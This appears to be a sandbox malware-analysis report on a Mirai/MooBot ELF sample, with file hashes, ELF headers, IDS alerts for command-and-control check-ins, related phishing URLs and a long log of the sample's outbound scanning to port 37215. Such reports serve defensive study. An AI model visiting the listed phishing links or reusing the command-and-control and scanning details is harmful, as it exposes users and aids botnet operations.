                                                        wNCWSwl1Lv.elfGet hashmaliciousMiraiBrowse
                                                        • 201.177.4.211
                                                        SVBUSAMjH2Tev6H.elfGet hashmaliciousMirai, GafgytBrowse
                                                        • 172.99.210.151
                                                        bIHCEUuP4x.elfGet hashmaliciousMirai, GafgytBrowse
                                                        • 172.99.210.166
                                                        https://firebasestorage.googleapis.com/v0/b/fsdhdhdfhsfgfd.appspot.com/o/vabscdvhbasfsdg.html?alt=media&token=95df98a7-97fa-4d7c-b4ee-c9043ec71fe4#4PsusQ114JNAU7whboqpjinq20BUWHBSPOQPGYLRR642LGOF4744j9,hxxps://firebasestorage.googleapis.com/v0/b/fsdhdhdfhsfgfd.appspot.com/o/vabscdvhbasfsdg.html?alt=media&token=95df98a7-97fa-4d7c-b4ee-c9043ec71fe4#4XXvyK114HJJc7pfqdtijsza20FMGPFLZBTLYZSGC642KAMB4744n9,hxxps://firebasestorage.googleapis.com/v0/b/fsdhdhdfhsfgfd.appspot.com/o/vabscdvhbasfsdg.html?alt=media&token=95df98a7-97fa-4d7c-b4ee-c9043ec71fe4#5HpEmk114bzIE7ttpsirxcoa20EPPQJOPLFVMTHLT642CQRQ4744E9Get hashmaliciousPhisherBrowse
                                                        • 172.99.172.128
                                                        https://363927.ellsworthmail.com/email/click/3/363927/dL9f0fal-X7g5UBlCi5QfJvvHDZHITJrV-Ic3bn2ygQ.2#cl!d=0_pt!l=442!m=55!o=10756Get hashmaliciousPhisherBrowse
                                                        • 172.99.172.22
                                                        KuWSWi7UYX.elfGet hashmaliciousMiraiBrowse
                                                        • 172.99.210.116
                                                        SecuriteInfo.com.Linux.Siggen.9999.20734.15655.elfGet hashmaliciousMiraiBrowse
                                                        • 172.99.210.148
                                                        6FQG7ckQYK.elfGet hashmaliciousMiraiBrowse
                                                        • 172.99.210.139
                                                        https://kiddushes.com/0/0/0/8e76d9aee5809553ad6668c7bfbfd114/oth23Get hashmaliciousPhisherBrowse
                                                        • 172.99.173.7
                                                        https://storage.googleapis.com/edusa/algonquincollege.html#4cCRYb398kcWP32jndkfhfjyc4MIWDSMDNXLSZCFF1708863VSUP299741N9Get hashmaliciousPhisherBrowse
                                                        • 172.99.172.246
                                                        https://storage.googleapis.com/edusa/algonquincollege.html#4oIXrT398LnkF32ajqxirfcrg4NWQPVFNZXVDZWNH1708863JDQB299741a9Get hashmaliciousUnknownBrowse
                                                        • 172.99.172.246
                                                        No context
                                                        No context
                                                        No created / dropped files found
                                                        File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                        Entropy (8bit):6.413030438667021
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:AFWaD3vnqR.elf
                                                        File size:122'848 bytes
                                                        MD5:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        SHA1:de0855f7475b25346cac04041900e3e949f08100
                                                        SHA256:b9c4aaded0e769c3da089f2250370b90158321a402d3856a9eae04911fac77a9
                                                        SHA512:c8f0756478779590f92a89e5fb5f7bf3e68e51c4c6f19ec222f75bb9553a5762f15878e8027321312b3f6061f0ec87c89463498e2bc42b847d2e0e2e54999764
                                                        SSDEEP:1536:Lui4JKIHdW178xZFoe3rNptI0jnltmx45iMu8r/Z/6KTYEhji4JRU:KiCKidWtC/oe3rNgKQx45G8LZPEEhu
                                                        TLSH:D1C32806768244FDC04AD2B57A5F6E36DC21B9ED0336B1AB73C0FA263C5CA21573BA54
                                                        File Content Preview:.ELF..............>.......@.....@.......`...........@.8...@.......................@.......@...............................................Q.......Q.....(........3..............Q.td....................................................H...._........H........

                                                        ELF header

                                                        Class:ELF64
                                                        Data:2's complement, little endian
                                                        Version:1 (current)
                                                        Machine:Advanced Micro Devices X86-64
                                                        Version Number:0x1
                                                        Type:EXEC (Executable file)
                                                        OS/ABI:UNIX - System V
                                                        ABI Version:0
                                                        Entry Point Address:0x400194
                                                        Flags:0x0
                                                        ELF Header Size:64
                                                        Program Header Offset:64
                                                        Program Header Size:56
                                                        Number of Program Headers:3
                                                        Section Header Offset:122208
                                                        Section Header Size:64
                                                        Number of Section Headers:10
                                                        Header String Table Index:9
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                        .textPROGBITS0x4001000x1000x193260x00x6AX0016
                                                        .finiPROGBITS0x4194260x194260xe0x00x6AX001
                                                        .rodataPROGBITS0x4194400x194400x43b00x00x2A0032
                                                        .ctorsPROGBITS0x51d7f80x1d7f80x100x00x3WA008
                                                        .dtorsPROGBITS0x51d8080x1d8080x100x00x3WA008
                                                        .dataPROGBITS0x51d8200x1d8200x5000x00x3WA0032
                                                        .bssNOBITS0x51dd200x1dd200x2ed00x00x3WA0032
                                                        .shstrtabSTRTAB0x00x1dd200x3e0x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x4000000x4000000x1d7f00x1d7f06.45750x5R E0x100000.init .text .fini .rodata
                                                        LOAD0x1d7f80x51d7f80x51d7f80x5280x33f82.16250x6RW 0x100000.ctors .dtors .data .bss
                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        03/21/24-05:21:54.323417TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)3363665535192.168.2.13109.205.214.35
                                                        03/21/24-05:21:51.957294TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)3360665535192.168.2.13109.205.214.35
                                                        03/21/24-05:21:50.625160TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)3320465535192.168.2.13109.205.214.35
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 21, 2024 05:21:47.375689030 CET4868837215192.168.2.13197.152.84.105
                                                        Mar 21, 2024 05:21:47.375716925 CET4868837215192.168.2.13197.39.237.184
                                                        Mar 21, 2024 05:21:47.375730991 CET4868837215192.168.2.13197.22.145.17
                                                        Mar 21, 2024 05:21:47.375752926 CET4868837215192.168.2.13197.47.174.105
                                                        Mar 21, 2024 05:21:47.375771999 CET4868837215192.168.2.13197.80.13.182
                                                        Mar 21, 2024 05:21:47.375771999 CET4868837215192.168.2.13197.70.76.247
                                                        Mar 21, 2024 05:21:47.375771999 CET4868837215192.168.2.13197.225.177.217
                                                        Mar 21, 2024 05:21:47.375792027 CET4868837215192.168.2.13197.169.91.205
                                                        Mar 21, 2024 05:21:47.375798941 CET4868837215192.168.2.13197.237.232.26
                                                        Mar 21, 2024 05:21:47.375799894 CET4868837215192.168.2.13197.231.223.151
                                                        Mar 21, 2024 05:21:47.375812054 CET4868837215192.168.2.13197.209.80.159
                                                        Mar 21, 2024 05:21:47.375823975 CET4868837215192.168.2.13197.52.28.184
                                                        Mar 21, 2024 05:21:47.375832081 CET4868837215192.168.2.13197.21.193.164
                                                        Mar 21, 2024 05:21:47.375832081 CET4868837215192.168.2.13197.234.137.168
                                                        Mar 21, 2024 05:21:47.375847101 CET4868837215192.168.2.13197.182.116.8
                                                        Mar 21, 2024 05:21:47.375853062 CET4868837215192.168.2.13197.232.127.111
                                                        Mar 21, 2024 05:21:47.375875950 CET4868837215192.168.2.13197.16.149.53
                                                        Mar 21, 2024 05:21:47.375875950 CET4868837215192.168.2.13197.195.126.87
                                                        Mar 21, 2024 05:21:47.375875950 CET4868837215192.168.2.13197.175.175.155
                                                        Mar 21, 2024 05:21:47.375881910 CET4868837215192.168.2.13197.55.109.181
                                                        Mar 21, 2024 05:21:47.375895023 CET4868837215192.168.2.13197.3.214.88
                                                        Mar 21, 2024 05:21:47.375895023 CET4868837215192.168.2.13197.16.247.174
                                                        Mar 21, 2024 05:21:47.375895977 CET4868837215192.168.2.13197.185.97.11
                                                        Mar 21, 2024 05:21:47.375921011 CET4868837215192.168.2.13197.226.216.17
                                                        Mar 21, 2024 05:21:47.375921011 CET4868837215192.168.2.13197.149.83.212
                                                        Mar 21, 2024 05:21:47.375921965 CET4868837215192.168.2.13197.26.42.28
                                                        Mar 21, 2024 05:21:47.375926971 CET4868837215192.168.2.13197.20.136.69
                                                        Mar 21, 2024 05:21:47.375941992 CET4868837215192.168.2.13197.208.10.213
                                                        Mar 21, 2024 05:21:47.375941992 CET4868837215192.168.2.13197.151.138.71
                                                        Mar 21, 2024 05:21:47.375962973 CET4868837215192.168.2.13197.143.47.62
                                                        Mar 21, 2024 05:21:47.375962973 CET4868837215192.168.2.13197.75.46.39
                                                        Mar 21, 2024 05:21:47.375962973 CET4868837215192.168.2.13197.241.233.190
                                                        Mar 21, 2024 05:21:47.375977993 CET4868837215192.168.2.13197.23.9.228
                                                        Mar 21, 2024 05:21:47.375979900 CET4868837215192.168.2.13197.96.1.210
                                                        Mar 21, 2024 05:21:47.375979900 CET4868837215192.168.2.13197.81.186.136
                                                        Mar 21, 2024 05:21:47.375989914 CET4868837215192.168.2.13197.114.215.77
                                                        Mar 21, 2024 05:21:47.375994921 CET4868837215192.168.2.13197.252.74.228
                                                        Mar 21, 2024 05:21:47.376008987 CET4868837215192.168.2.13197.25.154.230
                                                        Mar 21, 2024 05:21:47.376012087 CET4868837215192.168.2.13197.243.246.219
                                                        Mar 21, 2024 05:21:47.376012087 CET4868837215192.168.2.13197.251.82.174
                                                        Mar 21, 2024 05:21:47.376015902 CET4868837215192.168.2.13197.123.144.187
                                                        Mar 21, 2024 05:21:47.376038074 CET4868837215192.168.2.13197.6.160.75
                                                        Mar 21, 2024 05:21:47.376038074 CET4868837215192.168.2.13197.207.241.201
                                                        Mar 21, 2024 05:21:47.376038074 CET4868837215192.168.2.13197.114.39.226
                                                        Mar 21, 2024 05:21:47.376044035 CET4868837215192.168.2.13197.115.83.22
                                                        Mar 21, 2024 05:21:47.376061916 CET4868837215192.168.2.13197.173.61.232
                                                        Mar 21, 2024 05:21:47.376064062 CET4868837215192.168.2.13197.178.62.170
                                                        Mar 21, 2024 05:21:47.376064062 CET4868837215192.168.2.13197.252.165.41
                                                        Mar 21, 2024 05:21:47.376089096 CET4868837215192.168.2.13197.52.61.216
                                                        Mar 21, 2024 05:21:47.376099110 CET4868837215192.168.2.13197.16.255.159
                                                        Mar 21, 2024 05:21:47.376099110 CET4868837215192.168.2.13197.146.199.218
                                                        Mar 21, 2024 05:21:47.376104116 CET4868837215192.168.2.13197.151.90.181
                                                        Mar 21, 2024 05:21:47.376111984 CET4868837215192.168.2.13197.251.8.155
                                                        Mar 21, 2024 05:21:47.376127005 CET4868837215192.168.2.13197.68.208.168
                                                        Mar 21, 2024 05:21:47.376138926 CET4868837215192.168.2.13197.147.26.64
                                                        Mar 21, 2024 05:21:47.376142979 CET4868837215192.168.2.13197.205.52.139
                                                        Mar 21, 2024 05:21:47.376146078 CET4868837215192.168.2.13197.238.6.47
                                                        Mar 21, 2024 05:21:47.376156092 CET4868837215192.168.2.13197.244.151.106
                                                        Mar 21, 2024 05:21:47.376172066 CET4868837215192.168.2.13197.212.182.64
                                                        Mar 21, 2024 05:21:47.376176119 CET4868837215192.168.2.13197.238.105.39
                                                        Mar 21, 2024 05:21:47.376190901 CET4868837215192.168.2.13197.181.64.163
                                                        Mar 21, 2024 05:21:47.376193047 CET4868837215192.168.2.13197.198.11.203
                                                        Mar 21, 2024 05:21:47.376224995 CET4868837215192.168.2.13197.29.202.100
                                                        Mar 21, 2024 05:21:47.376235962 CET4868837215192.168.2.13197.191.32.252
                                                        Mar 21, 2024 05:21:47.376271963 CET4868837215192.168.2.13197.209.203.144
                                                        Mar 21, 2024 05:21:47.376276016 CET4868837215192.168.2.13197.20.247.15
                                                        Mar 21, 2024 05:21:47.376286030 CET4868837215192.168.2.13197.199.205.165
                                                        Mar 21, 2024 05:21:47.376301050 CET4868837215192.168.2.13197.199.26.128
                                                        Mar 21, 2024 05:21:47.376307964 CET4868837215192.168.2.13197.18.44.210
                                                        Mar 21, 2024 05:21:47.376312017 CET4868837215192.168.2.13197.16.224.185
                                                        Mar 21, 2024 05:21:47.376312017 CET4868837215192.168.2.13197.232.182.179
                                                        Mar 21, 2024 05:21:47.376312017 CET4868837215192.168.2.13197.102.181.4
                                                        Mar 21, 2024 05:21:47.376312017 CET4868837215192.168.2.13197.192.92.42
                                                        Mar 21, 2024 05:21:47.376318932 CET4868837215192.168.2.13197.181.201.53
                                                        Mar 21, 2024 05:21:47.376318932 CET4868837215192.168.2.13197.33.61.180
                                                        Mar 21, 2024 05:21:47.376328945 CET4868837215192.168.2.13197.21.110.45
                                                        Mar 21, 2024 05:21:47.376334906 CET4868837215192.168.2.13197.196.129.172
                                                        Mar 21, 2024 05:21:47.376342058 CET4868837215192.168.2.13197.85.75.181
                                                        Mar 21, 2024 05:21:47.376348019 CET4868837215192.168.2.13197.195.213.72
                                                        Mar 21, 2024 05:21:47.376357079 CET4868837215192.168.2.13197.145.15.53
                                                        Mar 21, 2024 05:21:47.376372099 CET4868837215192.168.2.13197.7.39.88
                                                        Mar 21, 2024 05:21:47.376374960 CET4868837215192.168.2.13197.207.250.170
                                                        Mar 21, 2024 05:21:47.376386881 CET4868837215192.168.2.13197.122.33.184
                                                        Mar 21, 2024 05:21:47.376400948 CET4868837215192.168.2.13197.119.89.164
                                                        Mar 21, 2024 05:21:47.376404047 CET4868837215192.168.2.13197.109.228.61
                                                        Mar 21, 2024 05:21:47.376420975 CET4868837215192.168.2.13197.232.190.250
                                                        Mar 21, 2024 05:21:47.376431942 CET4868837215192.168.2.13197.181.172.102
                                                        Mar 21, 2024 05:21:47.376451015 CET4868837215192.168.2.13197.11.37.205
                                                        Mar 21, 2024 05:21:47.376455069 CET4868837215192.168.2.13197.58.174.14
                                                        Mar 21, 2024 05:21:47.376462936 CET4868837215192.168.2.13197.210.49.160
                                                        Mar 21, 2024 05:21:47.376468897 CET4868837215192.168.2.13197.184.204.173
                                                        Mar 21, 2024 05:21:47.376471996 CET4868837215192.168.2.13197.189.194.81
                                                        Mar 21, 2024 05:21:47.376471996 CET4868837215192.168.2.13197.21.84.138
                                                        Mar 21, 2024 05:21:47.376471996 CET4868837215192.168.2.13197.199.134.236
                                                        Mar 21, 2024 05:21:47.376486063 CET4868837215192.168.2.13197.150.196.13
                                                        Mar 21, 2024 05:21:47.376493931 CET4868837215192.168.2.13197.18.145.253
                                                        Mar 21, 2024 05:21:47.376497030 CET4868837215192.168.2.13197.121.94.32
                                                        Mar 21, 2024 05:21:47.376507044 CET4868837215192.168.2.13197.116.0.2
                                                        Mar 21, 2024 05:21:47.376511097 CET4868837215192.168.2.13197.70.236.253
                                                        Mar 21, 2024 05:21:47.376518965 CET4868837215192.168.2.13197.151.136.56
                                                        Mar 21, 2024 05:21:47.376533031 CET4868837215192.168.2.13197.28.102.183
                                                        Mar 21, 2024 05:21:47.376537085 CET4868837215192.168.2.13197.102.151.232
                                                        Mar 21, 2024 05:21:47.376542091 CET4868837215192.168.2.13197.107.9.226
                                                        Mar 21, 2024 05:21:47.376550913 CET4868837215192.168.2.13197.65.210.139
                                                        Mar 21, 2024 05:21:47.376552105 CET4868837215192.168.2.13197.61.155.227
                                                        Mar 21, 2024 05:21:47.376552105 CET4868837215192.168.2.13197.55.252.119
                                                        Mar 21, 2024 05:21:47.376566887 CET4868837215192.168.2.13197.4.146.111
                                                        Mar 21, 2024 05:21:47.376566887 CET4868837215192.168.2.13197.145.155.103
                                                        Mar 21, 2024 05:21:47.376586914 CET4868837215192.168.2.13197.108.168.234
                                                        Mar 21, 2024 05:21:47.376588106 CET4868837215192.168.2.13197.152.135.36
                                                        Mar 21, 2024 05:21:47.376607895 CET4868837215192.168.2.13197.124.175.31
                                                        Mar 21, 2024 05:21:47.376607895 CET4868837215192.168.2.13197.157.217.33
                                                        Mar 21, 2024 05:21:47.376615047 CET4868837215192.168.2.13197.113.213.3
                                                        Mar 21, 2024 05:21:47.376622915 CET4868837215192.168.2.13197.96.207.25
                                                        Mar 21, 2024 05:21:47.376637936 CET4868837215192.168.2.13197.66.243.101
                                                        Mar 21, 2024 05:21:47.376642942 CET4868837215192.168.2.13197.42.237.168
                                                        Mar 21, 2024 05:21:47.376642942 CET4868837215192.168.2.13197.9.166.228
                                                        Mar 21, 2024 05:21:47.376656055 CET4868837215192.168.2.13197.198.201.208
                                                        Mar 21, 2024 05:21:47.376661062 CET4868837215192.168.2.13197.20.140.194
                                                        Mar 21, 2024 05:21:47.376676083 CET4868837215192.168.2.13197.42.41.112
                                                        Mar 21, 2024 05:21:47.376689911 CET4868837215192.168.2.13197.243.121.220
                                                        Mar 21, 2024 05:21:47.376689911 CET4868837215192.168.2.13197.36.126.96
                                                        Mar 21, 2024 05:21:47.376696110 CET4868837215192.168.2.13197.6.238.219
                                                        Mar 21, 2024 05:21:47.376698017 CET4868837215192.168.2.13197.100.233.243
                                                        Mar 21, 2024 05:21:47.376701117 CET4868837215192.168.2.13197.156.68.173
                                                        Mar 21, 2024 05:21:47.376718998 CET4868837215192.168.2.13197.167.196.96
                                                        Mar 21, 2024 05:21:47.376720905 CET4868837215192.168.2.13197.10.84.72
                                                        Mar 21, 2024 05:21:47.376737118 CET4868837215192.168.2.13197.121.191.159
                                                        Mar 21, 2024 05:21:47.376749992 CET4868837215192.168.2.13197.82.97.129
                                                        Mar 21, 2024 05:21:47.376775026 CET4868837215192.168.2.13197.201.77.220
                                                        Mar 21, 2024 05:21:47.376775026 CET4868837215192.168.2.13197.127.127.63
                                                        Mar 21, 2024 05:21:47.376786947 CET4868837215192.168.2.13197.108.150.81
                                                        Mar 21, 2024 05:21:47.376786947 CET4868837215192.168.2.13197.253.92.230
                                                        Mar 21, 2024 05:21:47.376802921 CET4868837215192.168.2.13197.77.98.205
                                                        Mar 21, 2024 05:21:47.376802921 CET4868837215192.168.2.13197.195.27.61
                                                        Mar 21, 2024 05:21:47.376827002 CET4868837215192.168.2.13197.132.53.72
                                                        Mar 21, 2024 05:21:47.376832962 CET4868837215192.168.2.13197.82.88.244
                                                        Mar 21, 2024 05:21:47.376838923 CET4868837215192.168.2.13197.224.85.132
                                                        Mar 21, 2024 05:21:47.376848936 CET4868837215192.168.2.13197.88.65.80
                                                        Mar 21, 2024 05:21:47.376867056 CET4868837215192.168.2.13197.189.252.240
                                                        Mar 21, 2024 05:21:47.376871109 CET4868837215192.168.2.13197.19.203.30
                                                        Mar 21, 2024 05:21:47.376882076 CET4868837215192.168.2.13197.166.173.251
                                                        Mar 21, 2024 05:21:47.376890898 CET4868837215192.168.2.13197.156.180.144
                                                        Mar 21, 2024 05:21:47.376899004 CET4868837215192.168.2.13197.172.124.196
                                                        Mar 21, 2024 05:21:47.376916885 CET4868837215192.168.2.13197.246.184.230
                                                        Mar 21, 2024 05:21:47.376919985 CET4868837215192.168.2.13197.155.30.5
                                                        Mar 21, 2024 05:21:47.376923084 CET4868837215192.168.2.13197.125.56.41
                                                        Mar 21, 2024 05:21:47.376930952 CET4868837215192.168.2.13197.251.160.44
                                                        Mar 21, 2024 05:21:47.376940012 CET4868837215192.168.2.13197.78.37.19
                                                        Mar 21, 2024 05:21:47.376948118 CET4868837215192.168.2.13197.8.60.110
                                                        Mar 21, 2024 05:21:47.376951933 CET4868837215192.168.2.13197.142.33.38
                                                        Mar 21, 2024 05:21:47.376956940 CET4868837215192.168.2.13197.102.153.93
                                                        Mar 21, 2024 05:21:47.376983881 CET4868837215192.168.2.13197.192.243.255
                                                        Mar 21, 2024 05:21:47.376985073 CET4868837215192.168.2.13197.48.111.196
                                                        Mar 21, 2024 05:21:47.376986027 CET4868837215192.168.2.13197.49.238.56
                                                        Mar 21, 2024 05:21:47.377002954 CET4868837215192.168.2.13197.238.110.103
                                                        Mar 21, 2024 05:21:47.377003908 CET4868837215192.168.2.13197.111.44.182
                                                        Mar 21, 2024 05:21:47.377021074 CET4868837215192.168.2.13197.79.231.131
                                                        Mar 21, 2024 05:21:47.377027988 CET4868837215192.168.2.13197.247.15.209
                                                        Mar 21, 2024 05:21:47.377029896 CET4868837215192.168.2.13197.188.178.134
                                                        Mar 21, 2024 05:21:47.377044916 CET4868837215192.168.2.13197.57.103.85
                                                        Mar 21, 2024 05:21:47.377053976 CET4868837215192.168.2.13197.94.246.234
                                                        Mar 21, 2024 05:21:47.377053976 CET4868837215192.168.2.13197.74.216.101
                                                        Mar 21, 2024 05:21:47.377064943 CET4868837215192.168.2.13197.212.96.83
                                                        Mar 21, 2024 05:21:47.377064943 CET4868837215192.168.2.13197.240.43.33
                                                        Mar 21, 2024 05:21:47.377073050 CET4868837215192.168.2.13197.130.164.199
                                                        Mar 21, 2024 05:21:47.377078056 CET4868837215192.168.2.13197.235.111.238
                                                        Mar 21, 2024 05:21:47.377093077 CET4868837215192.168.2.13197.235.127.43
                                                        Mar 21, 2024 05:21:47.377110004 CET4868837215192.168.2.13197.92.112.234
                                                        Mar 21, 2024 05:21:47.377110004 CET4868837215192.168.2.13197.35.25.216
                                                        Mar 21, 2024 05:21:47.377110958 CET4868837215192.168.2.13197.114.238.221
                                                        Mar 21, 2024 05:21:47.377115965 CET4868837215192.168.2.13197.153.49.251
                                                        Mar 21, 2024 05:21:47.377125025 CET4868837215192.168.2.13197.182.112.127
                                                        Mar 21, 2024 05:21:47.377140999 CET4868837215192.168.2.13197.84.167.192
                                                        Mar 21, 2024 05:21:47.377147913 CET4868837215192.168.2.13197.112.75.217
                                                        Mar 21, 2024 05:21:47.377147913 CET4868837215192.168.2.13197.206.128.220
                                                        Mar 21, 2024 05:21:47.377155066 CET4868837215192.168.2.13197.4.135.221
                                                        Mar 21, 2024 05:21:47.377157927 CET4868837215192.168.2.13197.87.114.58
                                                        Mar 21, 2024 05:21:47.377173901 CET4868837215192.168.2.13197.255.193.227
                                                        Mar 21, 2024 05:21:47.377175093 CET4868837215192.168.2.13197.106.86.200
                                                        Mar 21, 2024 05:21:47.377182007 CET4868837215192.168.2.13197.185.242.116
                                                        Mar 21, 2024 05:21:47.377198935 CET4868837215192.168.2.13197.210.66.249
                                                        Mar 21, 2024 05:21:47.377214909 CET4868837215192.168.2.13197.255.206.242
                                                        Mar 21, 2024 05:21:47.377219915 CET4868837215192.168.2.13197.41.190.248
                                                        Mar 21, 2024 05:21:47.377232075 CET4868837215192.168.2.13197.19.123.19
                                                        Mar 21, 2024 05:21:47.377233982 CET4868837215192.168.2.13197.87.148.13
                                                        Mar 21, 2024 05:21:47.377243042 CET4868837215192.168.2.13197.49.63.141
                                                        Mar 21, 2024 05:21:47.377249002 CET4868837215192.168.2.13197.104.191.202
                                                        Mar 21, 2024 05:21:47.377253056 CET4868837215192.168.2.13197.208.49.52
                                                        Mar 21, 2024 05:21:47.377259970 CET4868837215192.168.2.13197.213.19.185
                                                        Mar 21, 2024 05:21:47.377274036 CET4868837215192.168.2.13197.80.23.200
                                                        Mar 21, 2024 05:21:47.377298117 CET4868837215192.168.2.13197.127.16.232
                                                        Mar 21, 2024 05:21:47.377299070 CET4868837215192.168.2.13197.113.117.1
                                                        Mar 21, 2024 05:21:47.377298117 CET4868837215192.168.2.13197.6.25.218
                                                        Mar 21, 2024 05:21:47.377299070 CET4868837215192.168.2.13197.25.167.22
                                                        Mar 21, 2024 05:21:47.377312899 CET4868837215192.168.2.13197.134.140.136
                                                        Mar 21, 2024 05:21:47.377321959 CET4868837215192.168.2.13197.20.44.251
                                                        Mar 21, 2024 05:21:47.377332926 CET4868837215192.168.2.13197.29.175.125
                                                        Mar 21, 2024 05:21:47.377338886 CET4868837215192.168.2.13197.174.53.48
                                                        Mar 21, 2024 05:21:47.377351999 CET4868837215192.168.2.13197.121.77.114
                                                        Mar 21, 2024 05:21:47.377362013 CET4868837215192.168.2.13197.58.86.112
                                                        Mar 21, 2024 05:21:47.377363920 CET4868837215192.168.2.13197.67.228.78
                                                        Mar 21, 2024 05:21:47.377372026 CET4868837215192.168.2.13197.31.150.61
                                                        Mar 21, 2024 05:21:47.377388954 CET4868837215192.168.2.13197.175.26.223
                                                        Mar 21, 2024 05:21:47.377392054 CET4868837215192.168.2.13197.171.230.0
                                                        Mar 21, 2024 05:21:47.377402067 CET4868837215192.168.2.13197.212.106.88
                                                        Mar 21, 2024 05:21:47.377404928 CET4868837215192.168.2.13197.62.39.206
                                                        Mar 21, 2024 05:21:47.377414942 CET4868837215192.168.2.13197.218.1.160
                                                        Mar 21, 2024 05:21:47.377425909 CET4868837215192.168.2.13197.108.194.107
                                                        Mar 21, 2024 05:21:47.377434015 CET4868837215192.168.2.13197.177.234.143
                                                        Mar 21, 2024 05:21:47.377441883 CET4868837215192.168.2.13197.131.69.136
                                                        Mar 21, 2024 05:21:47.377443075 CET4868837215192.168.2.13197.93.93.3
                                                        Mar 21, 2024 05:21:47.377461910 CET4868837215192.168.2.13197.167.54.44
                                                        Mar 21, 2024 05:21:47.377461910 CET4868837215192.168.2.13197.235.221.143
                                                        Mar 21, 2024 05:21:47.377475023 CET4868837215192.168.2.13197.161.100.159
                                                        Mar 21, 2024 05:21:47.377486944 CET4868837215192.168.2.13197.132.195.81
                                                        Mar 21, 2024 05:21:47.377489090 CET4868837215192.168.2.13197.59.32.147
                                                        Mar 21, 2024 05:21:47.377500057 CET4868837215192.168.2.13197.198.113.60
                                                        Mar 21, 2024 05:21:47.377502918 CET4868837215192.168.2.13197.235.197.223
                                                        Mar 21, 2024 05:21:47.377525091 CET4868837215192.168.2.13197.190.138.195
                                                        Mar 21, 2024 05:21:47.377533913 CET4868837215192.168.2.13197.171.205.225
                                                        Mar 21, 2024 05:21:47.377537012 CET4868837215192.168.2.13197.166.63.87
                                                        Mar 21, 2024 05:21:47.377542973 CET4868837215192.168.2.13197.177.244.214
                                                        Mar 21, 2024 05:21:47.377567053 CET4868837215192.168.2.13197.207.66.68
                                                        Mar 21, 2024 05:21:47.377578974 CET4868837215192.168.2.13197.73.48.140
                                                        Mar 21, 2024 05:21:47.377584934 CET4868837215192.168.2.13197.116.107.37
                                                        Mar 21, 2024 05:21:47.377584934 CET4868837215192.168.2.13197.238.51.100
                                                        Mar 21, 2024 05:21:47.377598047 CET4868837215192.168.2.13197.13.42.28
                                                        Mar 21, 2024 05:21:47.377598047 CET4868837215192.168.2.13197.130.195.134
                                                        Mar 21, 2024 05:21:47.377608061 CET4868837215192.168.2.13197.63.124.92
                                                        Mar 21, 2024 05:21:47.377608061 CET4868837215192.168.2.13197.39.168.110
                                                        Mar 21, 2024 05:21:47.377631903 CET4868837215192.168.2.13197.18.48.70
                                                        Mar 21, 2024 05:21:47.377636909 CET4868837215192.168.2.13197.177.93.45
                                                        Mar 21, 2024 05:21:47.377646923 CET4868837215192.168.2.13197.96.93.47
                                                        Mar 21, 2024 05:21:47.377720118 CET4868837215192.168.2.13197.4.15.38
                                                        Mar 21, 2024 05:21:47.377728939 CET4868837215192.168.2.13197.209.43.223
                                                        Mar 21, 2024 05:21:47.377728939 CET4868837215192.168.2.13197.246.139.90
                                                        Mar 21, 2024 05:21:47.377748966 CET4868837215192.168.2.13197.197.209.222
                                                        Mar 21, 2024 05:21:47.377748966 CET4868837215192.168.2.13197.221.116.200
                                                        Mar 21, 2024 05:21:47.377754927 CET4868837215192.168.2.13197.78.118.235
                                                        Mar 21, 2024 05:21:47.377772093 CET4868837215192.168.2.13197.58.238.139
                                                        Mar 21, 2024 05:21:47.377785921 CET4868837215192.168.2.13197.251.197.109
                                                        Mar 21, 2024 05:21:47.377799034 CET4868837215192.168.2.13197.58.208.219
                                                        Mar 21, 2024 05:21:47.377810955 CET4868837215192.168.2.13197.255.251.222
                                                        Mar 21, 2024 05:21:47.377813101 CET4868837215192.168.2.13197.217.165.54
                                                        Mar 21, 2024 05:21:47.377831936 CET4868837215192.168.2.13197.198.143.246
                                                        Mar 21, 2024 05:21:47.377851963 CET4868837215192.168.2.13197.250.162.183
                                                        Mar 21, 2024 05:21:47.377852917 CET4868837215192.168.2.13197.112.30.14
                                                        Mar 21, 2024 05:21:47.377862930 CET4868837215192.168.2.13197.70.153.171
                                                        Mar 21, 2024 05:21:47.377876997 CET4868837215192.168.2.13197.229.191.157
                                                        Mar 21, 2024 05:21:47.377877951 CET4868837215192.168.2.13197.174.172.146
                                                        Mar 21, 2024 05:21:47.377877951 CET4868837215192.168.2.13197.125.85.180
                                                        Mar 21, 2024 05:21:47.377888918 CET4868837215192.168.2.13197.46.108.117
                                                        Mar 21, 2024 05:21:47.377892971 CET4868837215192.168.2.13197.214.68.93
                                                        Mar 21, 2024 05:21:47.377908945 CET4868837215192.168.2.13197.171.58.179
                                                        Mar 21, 2024 05:21:47.377912998 CET4868837215192.168.2.13197.45.198.82
                                                        Mar 21, 2024 05:21:47.379977942 CET4945680192.168.2.1395.102.213.167
                                                        Mar 21, 2024 05:21:47.379981041 CET4945680192.168.2.1395.36.237.184
                                                        Mar 21, 2024 05:21:47.379992962 CET4945680192.168.2.1395.112.152.102
                                                        Mar 21, 2024 05:21:47.379998922 CET4945680192.168.2.1395.144.146.167
                                                        Mar 21, 2024 05:21:47.380023003 CET4945680192.168.2.1395.64.9.12
                                                        Mar 21, 2024 05:21:47.380032063 CET4945680192.168.2.1395.126.123.232
                                                        Mar 21, 2024 05:21:47.380040884 CET4945680192.168.2.1395.205.68.239
                                                        Mar 21, 2024 05:21:47.380044937 CET4945680192.168.2.1395.0.145.143
                                                        Mar 21, 2024 05:21:47.380058050 CET4945680192.168.2.1395.167.143.32
                                                        Mar 21, 2024 05:21:47.380059004 CET4945680192.168.2.1395.104.31.53
